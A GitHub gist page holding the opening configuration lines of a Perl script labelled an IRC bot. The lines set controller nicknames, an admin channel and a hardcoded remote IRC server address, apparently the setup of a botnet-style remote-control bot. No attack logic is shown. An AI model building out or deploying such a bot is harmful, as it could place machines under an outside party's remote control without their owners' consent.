Skip to content

Instantly share code, notes, and snippets.

View sv0's full-sized avatar

Slavik Svyrydiuk sv0

View GitHub Profile
@sv0
sv0 / as.pl
Created January 24, 2019 14:41 — forked from nl5887/as.pl
Perl IRC bot
#!/usr/bin/perl
my @mast3rs = ("z","w","x");
my @hostauth = ("localhost");
my @admchan=("#ssh");
my @server = ("91.191.19.112");
$servidor= $server[rand scalar @server] unless $servidor;